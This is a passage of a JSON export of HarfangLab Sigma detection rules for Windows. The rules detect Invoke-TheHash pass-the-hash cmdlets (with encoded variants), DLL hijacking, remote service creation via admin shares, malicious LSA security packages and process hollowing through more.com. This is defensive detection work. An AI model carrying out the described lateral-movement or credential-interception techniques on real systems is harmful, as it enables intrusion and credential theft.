"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595934Z",
"creation_date": "2026-03-23T11:45:34.595937Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595945Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Kevin-Robertson/Invoke-TheHash",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1550/002/"
],
"name": "t1059_001_powershell_malicious_cmdlet_invoke_thehash_cmd.yml",
"content": "title: Malicious PowerShell Invoke-TheHash Commandlets in Command-line\nid: 39d92e23-6a48-41c3-ab96-57747580f3e1\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Invoke-TheHash module.\n Invoke-TheHash contains PowerShell functions for performing pass-the-hash attacks over WMI and SMB protocols.\n This module enables lateral movement by abusing captured NTLM hashes through .NET TCPClient, allowing attackers to authenticate and execute commands on remote systems without requiring the actual password.\n Common command patterns include Invoke-SMBExec, Invoke-WMIExec, and related NTLMv2 authentication attempts.\n Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.\n It is recommended to investigate PowerShell logs for Invoke-TheHash command patterns, correlate with network authentication attempts, and identify affected systems while revoking compromised NTLM hashes.\nreferences:\n - https://github.com/Kevin-Robertson/Invoke-TheHash\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1550/002/\ndate: 2022/10/12\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.lateral_movement\n - attack.t1550.002\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.InvokeTheHash\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_cmdlet:\n CommandLine|contains:\n # WMI Command Execution Function\n - 'Invoke-WMIExec'\n - 'SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA'\n - 'kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw'\n - 'JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA'\n # SMB Command Execution Function\n - 'Invoke-SMBExec'\n - 'SQBuAHYAbwBrAGUALQBTAE0AQgBFAHgAZQBjA'\n - 'kAbgB2AG8AawBlAC0AUwBNAEIARQB4AGUAYw'\n - 'JAG4AdgBvAGsAZQAtAFMATQBCAEUAeABlAGMA'\n # User, Group and NetSession and Share enumeration.\n - 'Invoke-SMBEnum'\n - 'SQBuAHYAbwBrAGUALQBTAE0AQgBFAG4AdQBtA'\n - 'kAbgB2AG8AawBlAC0AUwBNAEIARQBuAHUAbQ'\n - 'JAG4AdgBvAGsAZQAtAFMATQBCAEUAbgB1AG0A'\n # SMB Client, file sharing\n - 'Invoke-SMBClient'\n - 'SQBuAHYAbwBrAGUALQBTAE0AQgBDAGwAaQBlAG4AdA'\n - 'kAbgB2AG8AawBlAC0AUwBNAEIAQwBsAGkAZQBuAHQA'\n - 'JAG4AdgBvAGsAZQAtAFMATQBCAEMAbABpAGUAbgB0A'\n # Running above functions against multiple targets\n - 'Invoke-TheHash'\n - 'SQBuAHYAbwBrAGUALQBUAGgAZQBIAGEAcwBoA'\n - 'kAbgB2AG8AawBlAC0AVABoAGUASABhAHMAaA'\n - 'JAG4AdgBvAGsAZQAtAFQAaABlAEgAYQBzAGgA'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "39d92e23-6a48-41c3-ab96-57747580f3e1",
"rule_name": "Malicious PowerShell Invoke-TheHash Commandlets in Command-line",
"rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the Invoke-TheHash module.\nInvoke-TheHash contains PowerShell functions for performing pass-the-hash attacks over WMI and SMB protocols.\nThis module enables lateral movement by abusing captured NTLM hashes through .NET TCPClient, allowing attackers to authenticate and execute commands on remote systems without requiring the actual password.\nCommon command patterns include Invoke-SMBExec, Invoke-WMIExec, and related NTLMv2 authentication attempts.\nAuthentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.\nIt is recommended to investigate PowerShell logs for Invoke-TheHash command patterns, correlate with network authentication attempts, and identify affected systems while revoking compromised NTLM hashes.\n",
"rule_creation_date": "2022-10-12",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1550.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ac3b18f-d76a-4a86-ac8f-26c0cc249a24",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078589Z",
"creation_date": "2026-03-23T11:45:34.078591Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078596Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dmcertinst.yml",
"content": "title: DLL Hijacking via dmcertinst.exe\nid: 3ac3b18f-d76a-4a86-ac8f-26c0cc249a24\ndescription: |\n Detects potential Windows DLL Hijacking via dmcertinst.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dmcertinst.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\certenroll.dll'\n - '\\DMCmnUtils.dll'\n - '\\DSPARSE.dll'\n - '\\iri.dll'\n - '\\msvcp110_win.dll'\n - '\\ncrypt.dll'\n - '\\omadmapi.dll'\n - '\\umpdc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ac3b18f-d76a-4a86-ac8f-26c0cc249a24",
"rule_name": "DLL Hijacking via dmcertinst.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dmcertinst.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ad4fcf4-b08f-42fb-a82a-d6354c186bea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095635Z",
"creation_date": "2026-03-23T11:45:34.095637Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095641Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/003/",
"https://attack.mitre.org/techniques/T1569/002/",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_service_admin_share_create.yml",
"content": "title: Service Created Remotely via Admin Share\nid: 3ad4fcf4-b08f-42fb-a82a-d6354c186bea\ndescription: |\n Detects the creation of a service executing a remote image, a technique commonly employed in lateral movement.\n This method, notably used by Cobalt Strike's PsExec module, allows attackers to move laterally by creating services on remote systems that execute malicious payloads.\n While legitimate administrative tools may use similar techniques, unauthorized remote service execution often indicates adversary activity.\n It is recommended to investigate the source of remote service creation, validate the legitimacy of the service binary path, and correlate with authentication logs to identify potential lateral movement attempts.\nreferences:\n - https://attack.mitre.org/techniques/T1543/003/\n - https://attack.mitre.org/techniques/T1569/002/\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2025/06/11\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.003\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.Service\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: service\ndetection:\n selection:\n OperationType: 'create'\n ServiceCommandLine|contains:\n - 'C$'\n - 'ADMIN$'\n AgentVersion|gte|version: 4.9.0\n IsRemote: 'true'\n\n exclusion_rayinventory:\n ServiceCommandLine: '\\\\localhost\\ADMIN$\\Temp\\RayVentoryScanEngine\\mgsreservice.exe'\n ServiceName: 'RaynetRVPRE'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ad4fcf4-b08f-42fb-a82a-d6354c186bea",
"rule_name": "Service Created Remotely via Admin Share",
"rule_description": "Detects the creation of a service executing a remote image, a technique commonly employed in lateral movement.\nThis method, notably used by Cobalt Strike's PsExec module, allows attackers to move laterally by creating services on remote systems that execute malicious payloads.\nWhile legitimate administrative tools may use similar techniques, unauthorized remote service execution often indicates adversary activity.\nIt is recommended to investigate the source of remote service creation, validate the legitimacy of the service binary path, and correlate with authentication logs to identify potential lateral movement attempts.\n",
"rule_creation_date": "2025-06-11",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1543.003",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ada4475-911a-4c93-a5bd-9de28d773cd0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620858Z",
"creation_date": "2026-03-23T11:45:34.620860Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620864Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package",
"https://hadess.io/pwning-the-domain-persistence/",
"https://attack.mitre.org/techniques/T1547/005/"
],
"name": "t1547_005_persistence_lsa_security_package.yml",
"content": "title: LSA Security Package Installed\nid: 3ada4475-911a-4c93-a5bd-9de28d773cd0\ndescription: |\n Detects modifications to the LSA Security Packages registry key (HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages), which is used to register new Security Support Providers (SSPs).\n This technique is commonly abused by attackers to install malicious SSPs, allowing them to intercept credentials and maintain persistence by injection their DLLs into the LSASS process.\n It is recommended to investigate the registry details for any unrecognized programs in your environment, and whitelist any recurring legitimate details.\n If this action is malicious, restore the registry key to its baseline configuration while reviewing authentication logs for potential credential theft.\nreferences:\n - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package\n - https://hadess.io/pwning-the-domain-persistence/\n - https://attack.mitre.org/techniques/T1547/005/\ndate: 2020/09/22\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.005\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Security Packages'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages'\n\n filter_empty:\n Details:\n - '(Empty)'\n - '\"\"'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_vmware:\n Details:\n - '\"\";wsauth'\n - '\"\";VMWSU.DLL'\n - '\"\";VMWSU_V1_0.DLL'\n - '\"\";wsauth;VMWSU.DLL'\n\n exclusion_malwarebytes:\n Image: '?:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe'\n\n exclusion_citrix1:\n Details:\n - '?:\\Program Files (x86)\\Citrix\\system32\\ctxauth;\"\"'\n - 'ctxauth;\"\"'\n\n exclusion_citrix2:\n Image: '?:\\Windows\\System32\\msiexec.exe'\n Details|contains: '?:\\PROGRA~?\\Citrix\\System32\\ctxauth;'\n\n exclusion_legit:\n Details:\n - 'kerberos;msv1_0;pku2u;wdigest;tspkg;cloudap;schannel'\n - 'kerberos;msv1_0;pku2u;wdigest;cloudAP;tspkg;schannel'\n - 'kerberos;msv1_0;schannel;wdigest;tspkg'\n - 'kerberos;msv1_0;schannel;wdigest;tspkg;pku2u'\n - 'kerberos;msv1_0;schannel;wdigest;tspkg;pku2u;\"\";wsauth'\n - 'kerberos;msv1_0;schannel;wdigest;tspkg;pku2u;\"\"'\n - 'pku2u;wdigest;kerberos;msv1_0;tspkg;schannel;cloudAP'\n - 'pku2u;wdigest;cloudAP;kerberos;msv1_0;tspkg;schannel'\n - 'kerberos;msv1_0;pku2u;wdigest;tspkg;schannel;cloudAP'\n - '\"\";?:\\Program Files\\Yubico\\Login\\Yubico.AuthenticationPackage.dll'\n - ';?:\\Program Files\\Yubico\\Login\\Yubico.AuthenticationPackage.dll'\n - '\"\";tspkg'\n - '\"\";msoidssp'\n - '\"\";msoidssp;wsauth'\n\n exclusion_poqexec:\n Image: '?:\\Windows\\System32\\poqexec.exe'\n ProcessParentCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n\n exclusion_ivanti:\n Image:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\System32\\lsass.exe'\n Details|contains: ';?:\\Program Files\\Ivanti\\Ivanti Cloud Agent\\UWM_AC_ENGINE.WIN64\\AMLsaAP'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ada4475-911a-4c93-a5bd-9de28d773cd0",
"rule_name": "LSA Security Package Installed",
"rule_description": "Detects modifications to the LSA Security Packages registry key (HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages), which is used to register new Security Support Providers (SSPs).\nThis technique is commonly abused by attackers to install malicious SSPs, allowing them to intercept credentials and maintain persistence by injection their DLLs into the LSASS process.\nIt is recommended to investigate the registry details for any unrecognized programs in your environment, and whitelist any recurring legitimate details.\nIf this action is malicious, restore the registry key to its baseline configuration while reviewing authentication logs for potential credential theft.\n",
"rule_creation_date": "2020-09-22",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3b081a6b-6195-46fe-924f-a649c6059107",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621832Z",
"creation_date": "2026-03-23T11:45:34.621834Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621838Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.compass-security.com/2022/05/bloodhound-inner-workings-part-3/",
"https://car.mitre.org/analytics/CAR-2014-11-005/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_remote_registry_disableidle.yml",
"content": "title: Remote Registry Service Configuration Modified\nid: 3b081a6b-6195-46fe-924f-a649c6059107\ndescription: |\n Detects when the configuration of the Remote Registry Service is modified.\n This service is by default, disabled on workstations (starting with Windows 8) and enabled on servers. It is also set, by default, to stop automatically if it idles for more than 10 minutes.\n An adversary can remotely manipulate the registry of another machine if the Remote Registry service is enabled and valid credentials are obtained.\n It can be used by an attacker to prepare a Lateral Movement technique, discover the configuration of a host, achieve persistence, or anything that aids an adversary in achieving its objective.\n It is recommended to analyze the parent process to determine if this activity is normal in your infrastructure.\nreferences:\n - https://blog.compass-security.com/2022/05/bloodhound-inner-workings-part-3/\n - https://car.mitre.org/analytics/CAR-2014-11-005/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/09/13\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RemoteRegistry\\DisableIdleStop'\n\n filter_stop:\n Details: 'DWORD (0x00000001)' # It will stop after 10mins of idle\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3b081a6b-6195-46fe-924f-a649c6059107",
"rule_name": "Remote Registry Service Configuration Modified",
"rule_description": "Detects when the configuration of the Remote Registry Service is modified.\nThis service is by default, disabled on workstations (starting with Windows 8) and enabled on servers. It is also set, by default, to stop automatically if it idles for more than 10 minutes.\nAn adversary can remotely manipulate the registry of another machine if the Remote Registry service is enabled and valid credentials are obtained.\nIt can be used by an attacker to prepare a Lateral Movement technique, discover the configuration of a host, achieve persistence, or anything that aids an adversary in achieving its objective.\nIt is recommended to analyze the parent process to determine if this activity is normal in your infrastructure.\n",
"rule_creation_date": "2023-09-13",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3b24630e-1690-4a29-8fb1-c841f646d79b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069782Z",
"creation_date": "2026-03-23T11:45:34.069784Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069788Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader",
"https://www.crowdstrike.com/blog/hijackloader-expands-techniques/",
"https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/",
"https://attack.mitre.org/techniques/T1055/012/"
],
"name": "t1055_012_supicious_execution_from_more_com.yml",
"content": "title: Suspicious Process Launched by more.com\nid: 3b24630e-1690-4a29-8fb1-c841f646d79b\ndescription: |\n Detects processes started by the more.com Windows utility.\n The more.com binary is not supposed to spawn any process, therefore this behavior is suspicious.\n This behavior was spotted in a HijackLoader sample, in a September 2024 campaign and was used to execute the final payload via process hollowing.\n It is recommended to investigate the spawned process to look for other suspicious actions.\nreferences:\n - https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader\n - https://www.crowdstrike.com/blog/hijackloader-expands-techniques/\n - https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\n - https://attack.mitre.org/techniques/T1055/012/\ndate: 2024/09/19\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\more.com'\n\n exclusion_werfault:\n Image|endswith: '\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n OriginalFileName: 'WerFault.exe'\n Signed: 'true'\n\n exclusion_connhost:\n Image|endswith: '\\conhost.exe'\n CommandLine|contains: '\\conhost.exe 0xffffffff -Force'\n OriginalFileName: 'CONHOST.EXE'\n Signed: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3b24630e-1690-4a29-8fb1-c841f646d79b",
"rule_name": "Suspicious Process Launched by more.com",
"rule_description": "Detects processes started by the more.com Windows utility.\nThe more.com binary is not supposed to spawn any process, therefore this behavior is suspicious.\nThis behavior was spotted in a HijackLoader sample, in a September 2024 campaign and was used to execute the final payload via process hollowing.\nIt is recommended to investigate the spawned process to look for other suspicious actions.\n",
"rule_creation_date": "2024-09-19",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3b29a0f1-1ed0-42f2-a31e-f0496a442c96",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609613Z",
"creation_date": "2026-03-23T11:45:34.609617Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609624Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://laurentiu-raducu.medium.com/lockbit-3-0-ransomware-analysis-198b1d4b75a3",
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a",
"https://attack.mitre.org/techniques/T1486/"
],
"name": "t1486_ransomware_lockbit_v3_executed.yml",
